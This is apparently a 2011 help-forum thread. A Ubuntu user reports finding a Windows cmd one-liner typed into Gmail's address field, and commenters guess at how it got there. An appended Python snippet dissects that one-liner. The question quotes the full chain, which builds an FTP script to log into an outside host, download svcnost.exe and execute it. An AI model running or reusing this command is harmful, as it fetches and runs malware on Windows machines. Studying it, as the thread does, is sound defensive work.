My home PC is usually on, but the monitor is off. This evening I came home from work and found what looks like a hack attempt: in my browser, my Gmail was open (that was me), but it was in compose mode with the following in the TO field:
md /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit echo You got owned
This looks like Windows command line code to me, and the md start of the code, combined with the fact that Gmail was in compose mode, makes it evident that someone tried to run a cmd command. I guess I was lucky that I don't in fact run Windows on this PC, but I have others that do. This is the first time ever that something like this has happened to me. I'm not a Linux guru, and I wasn't running any other programs apart from Firefox at the time.
I'm absolutely sure that I didn't write this, and nobody else was physically at my computer. Also, I have recently changed my Google password (and all my other passwords) to something like vMA8ogd7bv so I don't think that someone hacked my Google account.
What just happened? How does someone put keystrokes on my computer when it's not granny's old Windows machine that has been running malware for years, but a recent new Ubuntu install?
Update:
Let me address some of the points and questions:
- I'm in Austria, in the countryside. My WLAN router runs WPA2/PSK and a medium-strong password that's not in the dictionary; would have to be brute-force and less than 50 meters from here; it's not likely that it got hacked.
- I'm using a USB wired keyboard, so again very unlikely that anybody could be within range to hack it.
- I wasn't using my computer at the time; it was just idling at home while I was at work. It's a monitor-mounted nettop PC, so I rarely turn it off.
- The machine is only two months old, only runs Ubuntu, and I'm not using weird software or visiting weird sites. It's mainly Stack Exchange, Gmail, and newspapers. No games. Ubuntu is set to keep itself up to date.
- I'm not aware of any VNC service running; I certainly haven't installed or enabled one. I've also not started any other servers. I'm unsure if any are running in Ubuntu by default?
- I know all the IP addresses in Gmail's account activity. I'm fairly sure Google wasn't an entryway.
- I found a Log File Viewer, but I don't know what to look for. Help?
What I really want to know is, and what really makes me feel unsafe, is: how can anyone from the Internet generate keystrokes on my machine? How can I prevent that without being all tinfoil-hat about it? I'm not a Linux geek, I'm a father who's messed with Windows for 20+ years and am tired of it. And in all the 18+ years of being online, I've never personally seen any hack attempt, so this is new to me.
Just because it's a new install doesn't mean you can't have malware, trojans and viruses. And they do exist for Linux as well as Windows. They're just not as common. – BBlake – 2011-04-20T18:29:41.967
Did anyone else have access to your computer, or do you have a very old wireless keyboard? Also, Ubuntu has a built-in VNC server. If that's active, a random script somewhere could have connected and assumed it was a Windows computer, sending the keystrokes WIN+R, cmd...... – TuxRug – 2011-04-20T19:32:48.160
@torbengb: Your post really scares me... – user541686 – 2011-04-20T20:00:11.580
@Mehrdad: how do you think I feel? I wasn't planning on computer time tonight. – Torben Gundtofte-Bruun – 2011-04-20T20:02:59.810
@torbengb: If that happened to me, I'd probably freak out for a few days. x___x Can't imagine what you went through... – user541686 – 2011-04-20T20:26:55.000
Are there any other computers on your wireless network? If the intruder broke their security it would give him an "in" to your local network, which could lead to cracking the Ubuntu box in various ways. – CarlF – 2011-04-20T20:28:20.897
I suppose the fact that it's left in the field allows you to see what it was the attacker was attempting to do. Search Google for ccteam10 and 765824. It looks like you are probably not the only one who's seen this hack. – music2myear – 2011-04-20T20:30:34.450
@CarlF luckily all other pc's were off, otherwise it could just as well have hit a Windows pc and zombied it! – Torben Gundtofte-Bruun – 2011-04-20T21:14:11.950
@torbengb : that's unlikely, given the evident amateurism of the attack, I doubt that any antivirus would have a problem catching it. – houbysoft – 2011-04-21T01:32:31.480
lol this SO sounds like some smart-a*s script kiddie – Nate Koppenhaver – 2011-04-21T04:08:16.670
"vMA8ogd7bv" - Did you say that your password is only 8 chars long? – YOU – 2011-04-21T05:23:52.233
@S.Mark: I only gave a rough example. For online stuff I use 10 chars. – Torben Gundtofte-Bruun – 2011-04-21T06:09:36.583
@torbengb Is that it! Hah! Mine's 20+ chars: ilkchsaltdy+whtthhllswrngwty+42 – Mateen Ulhaq – 2011-04-21T06:44:37.007
@muntoo ... and I'm sure you haven't written that down anywhere and don't use any app to manage them either, right? Let's not begin password-bashing; at least my password isn't password :-) – Torben Gundtofte-Bruun – 2011-04-21T08:39:29.763
@CarlF no, all other computers were on standby all day. This was the only computer that was on. – Torben Gundtofte-Bruun – 2011-04-21T13:45:35.303
@torbengb Nope, I have them all in memory. (I do have a file that keeps my passwords/usernames for different accounts, but you need a master password to crack that.) I do do a bit of password reuse, but I hope to change my habits soon... – Mateen Ulhaq – 2011-04-21T18:21:10.150
Indeed, all you need for remembering a long password is a good mnemonic. – Pops – 2011-04-21T18:47:34.983
Do you have a cat? – Zaki – 2011-05-19T12:59:17.583
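For readers who want to see what the string left in the TO field would have done on a Windows machine, the following added example (not part of the original question or comments) splits the chain apart, rebuilds the FTP script it writes with `echo >>`, and flags the download-then-run pattern. The `analyze` function and its report fields are names chosen for this illustration; the only real input is the command line quoted in the question.

```python
import re

# Command line exactly as quoted in the question above.
SAMPLE = ("md /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik "
          "&echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik "
          "&ftp -n -v -s:ik &del ik &svcnost.exe &exit echo You got owned")

ECHO_APPEND = re.compile(r"echo\s+(.*?)\s*>>\s*(\S+)\s*$", re.I)  # echo TEXT >> FILE
FTP_SCRIPT = re.compile(r"^ftp\b.*?-s:(\S+)", re.I)               # ftp ... -s:FILE


def analyze(cmdline):
    """Rebuild the FTP script assembled with echo >> and report what the chain does."""
    # Naive split on '&': good enough for one-liners like this, ignores quoting.
    segments = [s.strip() for s in cmdline.split("&") if s.strip()]
    files = {}  # file name -> lines (as word lists) echoed into it
    report = {"host": None, "port": None, "user": None, "downloads": [],
              "executed": [], "script_deleted": False, "suspicious": False}
    script = None
    for seg in segments:
        words = seg.split()
        first = words[0].lower()
        echo = ECHO_APPEND.search(seg)
        ftp = FTP_SCRIPT.match(seg)
        if echo:
            files.setdefault(echo.group(2).lower(), []).append(echo.group(1).split())
        elif ftp:
            script = ftp.group(1).lower()
            for line in files.get(script, []):
                verb = line[0].lower() if line else ""
                if verb == "open" and len(line) > 1:
                    report["host"] = line[1]
                    has_port = len(line) > 2 and line[2].isdigit()
                    report["port"] = int(line[2]) if has_port else 21
                elif verb == "user" and len(line) > 1:
                    report["user"] = line[1]
                elif verb in ("get", "recv") and len(line) > 1:
                    report["downloads"].append(line[-1].lower())
        elif first in ("del", "erase") and script in [w.lower() for w in words[1:]]:
            report["script_deleted"] = True
        elif first in report["downloads"]:
            report["executed"].append(first)
    # Fetching a file over scripted FTP and then running it is the pattern to flag.
    report["suspicious"] = bool(report["executed"])
    return report


if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print(f"{key}: {value}")
```

The same function can be pointed at process-creation or shell-history log lines from the Windows machines on the network to check whether a similar chain ever ran there.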